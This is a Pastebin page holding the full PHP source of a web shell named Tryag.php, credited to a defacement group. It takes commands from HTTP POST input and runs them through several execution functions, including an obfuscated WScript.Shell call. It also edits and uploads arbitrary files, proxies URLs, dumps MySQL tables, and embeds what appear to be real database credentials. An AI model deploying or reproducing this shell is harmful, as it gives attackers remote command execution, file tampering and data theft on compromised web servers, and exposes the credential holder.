API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 3rd, 2018
236
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 50.48 KB | None | 0 0
raw download clone embed print report
  1.  
  2. /******************************************************************************************************/
  3. /* Tryag.php - Edited By KingDefacer
  4. /* ??U?E C??C?? C???E?:
  5. /* by: 1.0 (03.10.2006)
  6. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
  7. /*
  8. /*
  9. /* KingDefacer@msn.com
  10. /******************************************************************************************************/
  11. /* ~~~ C?I?C?CE | C?I?C?CE ~~~ */
  12.  
  13. // ?EOU?? ???E C???? C???? C? E????? | Authentification
  14. // $auth = 1; - C???? ?C?I ?EOU?? C???? C???? ( authentification = On )
  15. // $auth = 0; - C???? ??? ?E???? C???? C???? ( authentification = Off )
  16. $auth = 1;
  17.  
  18. // (Login & Password for access)
  19. // !!! (CHANGE THIS!!!)
  20. // md5, C?EC???I ?C????? ?E? EO????? EUU 'tryag'
  21. // Login & password crypted with md5, default is 'tryag'
  22. $name='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C????? C??O?? (user login)
  23. $pass='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C?EC???I C??O?? (user password)
  24. /******************************************************************************************************/
  25. if($auth == 0) {
  26. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  27. {
  28. header('WWW-Authenticate: Basic realm="??? ?C?? ?C???E??"');
  29. header('HTTP/1.0 401 Unauthorized');
  30. exit("<b><a href=http://>tryag-team</a> : C?II?? ?U ???O E??C? ??? :)</b>");
  31. }
  32. }
  33. ?>
  34.  
  35.  
  36. <html>
  37. <head>
  38. <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
  39. <body bgcolor="#000000">
  40. <table Width='100%' height='10%' bgcolor='#AA0000' border='1'>
  41. <tr>
  42. <td><center><font size='6' color='#BBB516'></font></center></td>
  43. </tr>
  44. </table>
  45. <style type="text/css">
  46. body, td {
  47. font-family: "Tahoma";
  48. font-size: "12px";
  49. line-height: "150%";
  50. }
  51. .smlfont {
  52. font-family: "Tahoma";
  53. font-size: "11px";
  54. }
  55. .INPUT {
  56. FONT-SIZE: "12px";
  57. COLOR: "#000000";
  58. BACKGROUND-COLOR: "#FFFFFF";
  59. height: "18px";
  60. border: 1px solid #666666 none;
  61. padding-left: "2px"
  62. }
  63. .redfont {
  64. COLOR: "#A60000";
  65. }
  66. a:link, a:visited, a:active {
  67. color: "#FF0000";
  68. text-decoration: underline;
  69. }
  70. a:hover {
  71. color: "#FFFFFF";
  72. text-decoration: none;
  73. }
  74. .top {BACKGROUND-COLOR: "#AA0000"}
  75. .firstalt {BACKGROUND-COLOR: "#000000"}
  76. .secondalt {BACKGROUND-COLOR: "#000000"}
  77. </style>
  78. <SCRIPT language=JavaScript>
  79. function CheckAll(form) {
  80. for (var i=0;i<form.elements.length;i++) {
  81. var e = form.elements[i];
  82. if (e.name != 'chkall')
  83. e.checked = form.chkall.checked;
  84. }
  85. }
  86. function really(d,f,m,t) {
  87. if (confirm(m)) {
  88. if (t == 1) {
  89. window.location.href='?dir='+d+'&deldir='+f;
  90. } else {
  91. window.location.href='?dir='+d+'&delfile='+f;
  92. }
  93. }
  94. }
  95. </SCRIPT>
  96. </head>
  97.  
  98. <body>
  99. <center>
  100.  
  101. <hr width="775" noshade>
  102. <table width="775" border="0" cellpadding="0">
  103. <?PHP
  104.  
  105.  
  106.  
  107. error_reporting(7);
  108. ob_start();
  109. $mtime = explode(' ', microtime());
  110. $starttime = $mtime[1] + $mtime[0];
  111. $onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
  112. if ($onoff != 1) {
  113. @extract($_POST, EXTR_SKIP);
  114. @extract($_GET, EXTR_SKIP);
  115. }
  116. $mohajer = getcwd();
  117. $self = $_SERVER['PHP_SELF'];
  118. $dis_func = get_cfg_var("disable_functions");
  119.  
  120. ///////////////////////////////
  121. //
  122. $mysql_use = "no"; //"yes" //
  123. $mhost = "localhost"; //
  124. $muser = "mjalnet_mjal"; //
  125. $mpass = "99080806"; //
  126. $mdb = "mjalnet_vb"; //
  127. //
  128. ///////////////////////////////
  129.  
  130.  
  131. if (get_magic_quotes_gpc()) {
  132. $_GET = stripslashes_array($_GET);
  133. $_POST = stripslashes_array($_POST);
  134. }
  135.  
  136.  
  137.  
  138. if (empty($_POST['phpinfo'] )) {
  139. }else{
  140. echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
  141. exit;
  142. }
  143.  
  144.  
  145. if (isset($_POST['url'])) {
  146. $proxycontents = @file_get_contents($_POST['url']);
  147. echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»?E? URL ??E?E§°U</b></p></center></body>";
  148. exit;
  149. }
  150.  
  151. if (empty($_POST['TrYaG'] ) ) {
  152. }ELSE{
  153. $action = '?action=TrYaG';
  154. echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'>
  155. C??C?? C???E?<br><br>
  156. 020 <br><br>
  157. C???C??22 <br><br>
  158. CE????C? <br><br>
  159. ??CE? U?? <br><br>
  160. cRiMiNaL NeT <br><br>
  161. MR.WOLF <br><br>
  162. ?EIC???00 <br><br>
  163. ????I ??? <br><br>
  164. ?C?? C????I <br><br>
  165. al3iznet <br><br>
  166. C???O C??C??<br><br>
  167. ???? C????? ????UE <br><br>
  168. ??U?E C??C?? C???E? & E??C? C???E <br><br>
  169. www.CyberGrup.Org/vb <br><br>
  170. ???? EC???? E? C??? ?I? C?C?? ???? C??? ?? <br><br>";
  171.  
  172.  
  173. echo "</font></center></td></tr></table> ";
  174.  
  175. exit;
  176. }
  177. if (empty($_POST['command'] ) ) {
  178. }ELSE{
  179. if (substr(PHP_OS, 0, 3) == 'WIN') {
  180. $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
  181. $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
  182.  
  183. echo "</form>\n";
  184. }
  185. $tb = new FORMS;
  186.  
  187. $tb->tableheader();
  188. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
  189. $tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
  190. $tb->tablefooter();
  191. $tb->tableheader();
  192. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
  193. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  194.  
  195. $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
  196. $tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
  197.  
  198. echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
  199.  
  200. if ($_POST['command'] ) {
  201.  
  202. if ($execfunc=="system") {
  203. system($_POST['command']);
  204. } elseif ($execfunc=="passthru") {
  205. passthru($_POST['command']);
  206. } elseif ($execfunc=="exec") {
  207. $result = exec($_POST['command']);
  208. echo $result;
  209. } elseif ($execfunc=="shell_exec") {
  210. $result=shell_exec($_POST['command']);
  211. echo $result;
  212. } elseif ($execfunc=="popen") {
  213. $pp = popen($_POST['command'], 'r');
  214. $read = fread($pp, 2096);
  215. echo $read;
  216. pclose($pp);
  217. } elseif ($execfunc=="wscript") {
  218. $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
  219. $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
  220. $stdout = $exec->StdOut();
  221. $stroutput = $stdout->ReadAll();
  222. echo $stroutput;
  223. } else {
  224. system($_POST['command']);
  225. }
  226.  
  227. }
  228.  
  229. echo"</textarea></td></tr></form></table>";
  230. exit;
  231. }//end shell
  232.  
  233. if ($_POST['editfile']){
  234. $fp = fopen($_POST['editfile'], "r");
  235. $filearr = file($_POST['editfile']);
  236.  
  237. foreach ($filearr as $string){
  238.  
  239. $content = $content . $string;
  240. }
  241.  
  242. echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>";
  243. echo"<input type='hidden' name='dir' value='" . getcwd() ."'>
  244. <input type='hidden' name='savefile' value='{$_POST['editfile']}'><br>
  245. <input type='submit' name='submit' value='Save'></form></center>";
  246.  
  247. fclose($fp);
  248. }
  249.  
  250.  
  251. if($_POST['savefile']){
  252.  
  253. $fp = fopen($_POST['savefile'], "w");
  254. $content = stripslashes($content);
  255. fwrite($fp, $content);
  256. fclose($fp);
  257. echo "<center><div id=logostrip>Successfully saved!</div></center>";
  258.  
  259. }
  260. if ($doupfile) {
  261. echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "EI?«?E?¦!" : "EI?«E§°U!";
  262. }
  263.  
  264.  
  265. elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
  266. if (!empty($newdirectory)) {
  267. $mkdirs="$dir/$newdirectory";
  268. if (file_exists("$mkdirs")) {
  269. echo "can't make dir";
  270. } else {
  271. echo (@mkdir("$mkdirs",0777)) ? "ok" : "";
  272. @chmod("$mkdirs",0777);
  273. }
  274. }
  275. }
  276.  
  277. /////////
  278. $pathname=str_replace('\\','/',dirname(__FILE__));
  279.  
  280. ////////
  281. if (!isset($dir) or empty($dir)) {
  282. $dir = ".";
  283. $nowpath = getPath($pathname, $dir);
  284. } else {
  285. $dir=$_post['dir'];
  286. $nowpath = getPath($pathname, $dir);
  287. }
  288.  
  289. ///////
  290. $dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm";
  291. $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
  292. $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
  293.  
  294. $tb = new FORMS;
  295.  
  296. $tb->tableheader();
  297. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
  298. $tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
  299. $tb->tablefooter();
  300. $tb->tableheader();
  301. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>','center','top');
  302. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  303. $tb->headerform(array('content'=>'<FONT COLOR=RED>File to edit or make:</FONT>'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit')));
  304.  
  305.  
  306. $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=RED>Uploud file:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
  307.  
  308. $tb->headerform(array('content'=>'<FONT COLOR=RED>Make directory:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit')));
  309. $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
  310. $tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
  311.  
  312. $tb->tdbody ("</td></tr></table>");
  313. if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
  314.  
  315.  
  316. $tb->tableheader();
  317. echo"<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";
  318.  
  319. $dirs=@opendir($dir);
  320. $dir_i = '0';
  321. while ($file=@readdir($dirs)) {
  322. $filepath="$dir/$file";
  323. $a=@is_dir($filepath);
  324. if($a=="1"){
  325. if($file!=".." && $file!=".") {
  326. $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
  327. $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  328. $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
  329. echo "<tr class=".getrowbg().">\n";
  330. echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
  331. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
  332. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
  333. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">&lt;dir&gt;</span></td>\n";
  334. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n";
  335. echo "</tr>\n";
  336. $dir_i++;
  337. } else {
  338. if($file=="..") {
  339. echo "<tr class=".getrowbg().">\n";
  340. echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n";
  341. echo "</tr>\n";
  342. }
  343. }
  344. }
  345. }// while
  346. @closedir($dirs);
  347.  
  348. echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM method='POST'>";
  349.  
  350. $dirs=@opendir($dir);
  351. $file_i = '0';
  352. while ($file=@readdir($dirs)) {
  353. $filepath="$dir/$file";
  354. $a=@is_dir($filepath);
  355. if($a=="0"){
  356. $size=@filesize($filepath);
  357. $size=$size/1024 ;
  358. $size= @number_format($size, 3);
  359. if (@filectime($filepath) == @filemtime($filepath)) {
  360. $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
  361. $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  362. } else {
  363. $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
  364. $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
  365. }
  366. @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
  367. echo "<tr class=".getrowbg().">\n";
  368. echo " <td style=\"padding-left: 5px;\">";
  369. echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
  370. echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
  371. if ($file == 'config.php') {
  372.  
  373. echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n";
  374. }
  375. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
  376. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
  377. echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
  378. echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n";
  379. echo "</tr>\n";
  380. $file_i++;
  381.  
  382.  
  383. }
  384. }// while
  385. @closedir($dirs);
  386.  
  387. echo "</FORM>\n";
  388. echo "</table>\n";
  389. }// end dir
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397. function debuginfo() {
  398. global $starttime;
  399. $mtime = explode(' ', microtime());
  400. $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
  401. echo "Processed in $totaltime second(s)";
  402. }
  403.  
  404.  
  405. function stripslashes_array(&$array) {
  406. while(list($key,$var) = each($array)) {
  407. if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
  408. if (is_string($var)) {
  409. $array[$key] = stripslashes($var);
  410. }
  411. if (is_array($var)) {
  412. $array[$key] = stripslashes_array($var);
  413. }
  414. }
  415. }
  416. return $array;
  417. }
  418.  
  419.  
  420. function deltree($deldir) {
  421. $mydir=@dir($deldir);
  422. while($file=$mydir->read()) {
  423. if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
  424. @chmod("$deldir/$file",0777);
  425. deltree("$deldir/$file");
  426. }
  427. if (is_file("$deldir/$file")) {
  428. @chmod("$deldir/$file",0777);
  429. @unlink("$deldir/$file");
  430. }
  431. }
  432. $mydir->close();
  433. @chmod("$deldir",0777);
  434. return (@rmdir($deldir)) ? 1 : 0;
  435. }
  436.  
  437.  
  438. function dir_writeable($dir) {
  439. if (!is_dir($dir)) {
  440. @mkdir($dir, 0777);
  441. }
  442. if(is_dir($dir)) {
  443. if ($fp = @fopen("$dir/test.txt", 'w')) {
  444. @fclose($fp);
  445. @unlink("$dir/test.txt");
  446. $writeable = 1;
  447. } else {
  448. $writeable = 0;
  449. }
  450. }
  451. return $writeable;
  452. }
  453.  
  454.  
  455. function getrowbg() {
  456. global $bgcounter;
  457. if ($bgcounter++%2==0) {
  458. return "firstalt";
  459. } else {
  460. return "secondalt";
  461. }
  462. }
  463.  
  464.  
  465. function getPath($mainpath, $relativepath) {
  466. global $dir;
  467. $mainpath_info = explode('/', $mainpath);
  468. $relativepath_info = explode('/', $relativepath);
  469. $relativepath_info_count = count($relativepath_info);
  470. for ($i=0; $i<$relativepath_info_count; $i++) {
  471. if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
  472. if ($relativepath_info[$i] == '..') {
  473. $mainpath_info_count = count($mainpath_info);
  474. unset($mainpath_info[$mainpath_info_count-1]);
  475. continue;
  476. }
  477. $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
  478. }
  479. return implode('/', $mainpath_info);
  480. }
  481.  
  482.  
  483. function getphpcfg($varname) {
  484. switch($result = get_cfg_var($varname)) {
  485. case 0:
  486. return "No";
  487. break;
  488. case 1:
  489. return "Yes";
  490. break;
  491. default:
  492. return $result;
  493. break;
  494. }
  495. }
  496.  
  497.  
  498. function getfun($funName) {
  499. return (false !== function_exists($funName)) ? "Yes" : "No";
  500. }
  501.  
  502.  
  503. class PHPZip{
  504. var $out='';
  505. function PHPZip($dir) {
  506. if (@function_exists('gzcompress')) {
  507. $curdir = getcwd();
  508. if (is_array($dir)) $filelist = $dir;
  509. else{
  510. $filelist=$this -> GetFileList($dir);//I?????±?
  511. foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
  512. }
  513. if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
  514. else chdir($curdir);
  515. if (count($filelist)>0){
  516. foreach($filelist as $filename){
  517. if (is_file($filename)){
  518. $fd = fopen ($filename, "r");
  519. $content = @fread ($fd, filesize ($filename));
  520. fclose ($fd);
  521. if (is_array($dir)) $filename = basename($filename);
  522. $this -> addFile($content, $filename);
  523. }
  524. }
  525. $this->out = $this -> file();
  526. chdir($curdir);
  527. }
  528. return 1;
  529. }
  530. else return 0;
  531. }
  532.  
  533.  
  534. function GetFileList($dir){
  535. static $a;
  536. if (is_dir($dir)) {
  537. if ($dh = opendir($dir)) {
  538. while (($file = readdir($dh)) !== false) {
  539. if($file!='.' && $file!='..'){
  540. $f=$dir .'/'. $file;
  541. if(is_dir($f)) $this->GetFileList($f);
  542. $a[]=$f;
  543. }
  544. }
  545. closedir($dh);
  546. }
  547. }
  548. return $a;
  549. }
  550.  
  551. var $datasec = array();
  552. var $ctrl_dir = array();
  553. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  554. var $old_offset = 0;
  555.  
  556. function unix2DosTime($unixtime = 0) {
  557. $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
  558. if ($timearray['year'] < 1980) {
  559. $timearray['year'] = 1980;
  560. $timearray['mon'] = 1;
  561. $timearray['mday'] = 1;
  562. $timearray['hours'] = 0;
  563. $timearray['minutes'] = 0;
  564. $timearray['seconds'] = 0;
  565. } // end if
  566. return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
  567. ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  568. }
  569.  
  570. function addFile($data, $name, $time = 0) {
  571. $name = str_replace('\\', '/', $name);
  572.  
  573. $dtime = dechex($this->unix2DosTime($time));
  574. $hexdtime = '\x' . $dtime[6] . $dtime[7]
  575. . '\x' . $dtime[4] . $dtime[5]
  576. . '\x' . $dtime[2] . $dtime[3]
  577. . '\x' . $dtime[0] . $dtime[1];
  578. eval('$hexdtime = "' . $hexdtime . '";');
  579. $fr = "\x50\x4b\x03\x04";
  580. $fr .= "\x14\x00";
  581. $fr .= "\x00\x00";
  582. $fr .= "\x08\x00";
  583. $fr .= $hexdtime;
  584.  
  585. $unc_len = strlen($data);
  586. $crc = crc32($data);
  587. $zdata = gzcompress($data);
  588. $c_len = strlen($zdata);
  589. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
  590. $fr .= pack('V', $crc);
  591. $fr .= pack('V', $c_len);
  592. $fr .= pack('V', $unc_len);
  593. $fr .= pack('v', strlen($name));
  594. $fr .= pack('v', 0);
  595. $fr .= $name;
  596.  
  597. $fr .= $zdata;
  598.  
  599. $fr .= pack('V', $crc);
  600. $fr .= pack('V', $c_len);
  601. $fr .= pack('V', $unc_len);
  602.  
  603. $this -> datasec[] = $fr;
  604. $new_offset = strlen(implode('', $this->datasec));
  605.  
  606. $cdrec = "\x50\x4b\x01\x02";
  607. $cdrec .= "\x00\x00";
  608. $cdrec .= "\x14\x00";
  609. $cdrec .= "\x00\x00";
  610. $cdrec .= "\x08\x00";
  611. $cdrec .= $hexdtime;
  612. $cdrec .= pack('V', $crc);
  613. $cdrec .= pack('V', $c_len);
  614. $cdrec .= pack('V', $unc_len);
  615. $cdrec .= pack('v', strlen($name) );
  616. $cdrec .= pack('v', 0 );
  617. $cdrec .= pack('v', 0 );
  618. $cdrec .= pack('v', 0 );
  619. $cdrec .= pack('v', 0 );
  620. $cdrec .= pack('V', 32 );
  621. $cdrec .= pack('V', $this -> old_offset );
  622. $this -> old_offset = $new_offset;
  623. $cdrec .= $name;
  624.  
  625. $this -> ctrl_dir[] = $cdrec;
  626. }
  627.  
  628. function file() {
  629. $data = implode('', $this -> datasec);
  630. $ctrldir = implode('', $this -> ctrl_dir);
  631. return
  632. $data .
  633. $ctrldir .
  634. $this -> eof_ctrl_dir .
  635. pack('v', sizeof($this -> ctrl_dir)) .
  636. pack('v', sizeof($this -> ctrl_dir)) .
  637. pack('V', strlen($ctrldir)) .
  638. pack('V', strlen($data)) .
  639. "\x00\x00";
  640. }
  641. }
  642.  
  643. function sqldumptable($table, $fp=0) {
  644. $tabledump = "DROP TABLE IF EXISTS $table;\n";
  645. $tabledump .= "CREATE TABLE $table (\n";
  646.  
  647. $firstfield=1;
  648.  
  649. $fields = mysql_query("SHOW FIELDS FROM $table");
  650. while ($field = mysql_fetch_array($fields)) {
  651. if (!$firstfield) {
  652. $tabledump .= ",\n";
  653. } else {
  654. $firstfield=0;
  655. }
  656. $tabledump .= " $field[Field] $field[Type]";
  657. if (!empty($field["Default"])) {
  658. $tabledump .= " DEFAULT '$field[Default]'";
  659. }
  660. if ($field['Null'] != "YES") {
  661. $tabledump .= " NOT NULL";
  662. }
  663. if ($field['Extra'] != "") {
  664. $tabledump .= " $field[Extra]";
  665. }
  666. }
  667. mysql_free_result($fields);
  668.  
  669. $keys = mysql_query("SHOW KEYS FROM $table");
  670. while ($key = mysql_fetch_array($keys)) {
  671. $kname=$key['Key_name'];
  672. if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
  673. $kname="UNIQUE|$kname";
  674. }
  675. if(!is_array($index[$kname])) {
  676. $index[$kname] = array();
  677. }
  678. $index[$kname][] = $key['Column_name'];
  679. }
  680. mysql_free_result($keys);
  681.  
  682. while(list($kname, $columns) = @each($index)) {
  683. $tabledump .= ",\n";
  684. $colnames=implode($columns,",");
  685.  
  686. if ($kname == "PRIMARY") {
  687. $tabledump .= " PRIMARY KEY ($colnames)";
  688. } else {
  689. if (substr($kname,0,6) == "UNIQUE") {
  690. $kname=substr($kname,7);
  691. }
  692. $tabledump .= " KEY $kname ($colnames)";
  693. }
  694. }
  695.  
  696. $tabledump .= "\n);\n\n";
  697. if ($fp) {
  698. fwrite($fp,$tabledump);
  699. } else {
  700. echo $tabledump;
  701. }
  702.  
  703. $rows = mysql_query("SELECT * FROM $table");
  704. $numfields = mysql_num_fields($rows);
  705. while ($row = mysql_fetch_array($rows)) {
  706. $tabledump = "INSERT INTO $table VALUES(";
  707.  
  708. $fieldcounter=-1;
  709. $firstfield=1;
  710. while (++$fieldcounter<$numfields) {
  711. if (!$firstfield) {
  712. $tabledump.=", ";
  713. } else {
  714. $firstfield=0;
  715. }
  716.  
  717. if (!isset($row[$fieldcounter])) {
  718. $tabledump .= "NULL";
  719. } else {
  720. $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
  721. }
  722. }
  723.  
  724. $tabledump .= ");\n";
  725.  
  726. if ($fp) {
  727. fwrite($fp,$tabledump);
  728. } else {
  729. echo $tabledump;
  730. }
  731. }
  732. mysql_free_result($rows);
  733. }
  734.  
  735. class FORMS {
  736. function tableheader() {
  737. echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
  738. }
  739.  
  740. function headerform($arg=array()) {
  741. global $dir;
  742. if ($arg[enctype]){
  743. $enctype="enctype=\"$arg[enctype]\"";
  744. } else {
  745. $enctype="";
  746. }
  747. if (!isset($arg[method])) {
  748. $arg[method] = "POST";
  749. }
  750. if (!isset($arg[action])) {
  751. $arg[action] = '';
  752. }
  753. echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
  754. echo " <tr>\n";
  755. echo " <td>".$arg[content]."</td>\n";
  756. echo " </tr>\n";
  757. echo " </form>\n";
  758. }
  759.  
  760. function tdheader($title) {
  761. global $dir;
  762. echo " <tr class=\"firstalt\">\n";
  763. echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·mohajer</a>]</b></td>\n";
  764. echo " </tr>\n";
  765. }
  766.  
  767. function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
  768. if ($bgcolor=='2') {
  769. $css="secondalt";
  770. } elseif ($bgcolor=='1') {
  771. $css="firstalt";
  772. } else {
  773. $css=$bgcolor;
  774. }
  775. $height = empty($height) ? "" : " height=".$height;
  776. $colspan = empty($colspan) ? "" : " colspan=".$colspan;
  777. echo " <tr class=\"".$css."\">\n";
  778. echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
  779. echo " </tr>\n";
  780. }
  781.  
  782. function tablefooter() {
  783. echo "</table>\n";
  784. }
  785.  
  786. function formheader($action='',$title,$target='') {
  787. global $dir;
  788. $target = empty($target) ? "" : " target=\"".$target."\"";
  789. echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
  790. echo " <tr class=\"firstalt\">\n";
  791. echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»?</a>]</b></td>\n";
  792. echo " </tr>\n";
  793. }
  794.  
  795. function makehidden($name,$value=''){
  796. echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
  797. }
  798.  
  799. function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
  800. $css = ($css == 'input') ? " class=\"input\"" : "";
  801. $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
  802. return $input;
  803. }
